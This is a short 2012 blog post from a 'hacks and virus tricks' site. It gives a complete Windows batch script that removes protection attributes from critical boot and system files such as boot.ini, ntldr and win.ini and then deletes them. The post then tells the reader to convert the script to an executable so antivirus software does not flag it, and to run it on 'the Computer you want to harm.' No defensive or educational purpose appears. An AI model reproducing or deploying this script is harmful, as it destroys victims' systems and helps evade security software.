- Back to Home »
- Hacks , Virus Tricks , Windows »
- How to terminate a computer?
Sunday, June 24, 2012
Many of the users call this a virus, but it’s just a batch file. This is a yet another Windows prank, but a serious one. Where you are able to terminate a computer forever (shutdown), by making a Batch File. This batch file will starts deleting very useful system files then it will shuts down the computer with Shutdown Command.
Steps:-
1) Open notepad.
2) Copy the following text and paste it to
Notepad:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3) Save the file as: Shutdown.bat
4) Convert the .Bat file to .Exe using Bat2Exe Converter.
This is necessary as most Anti-viruses will
detect it as Malware.
5)
Run the converted Exe file in the Computer you want to harm.Bat2Exe Convertor has many features as encryption, visibility and icon changer and so on.
Note:- Do not try this on your Computer, else you'll not be able to recover it unless you re-install Windows. Disclaimer Act.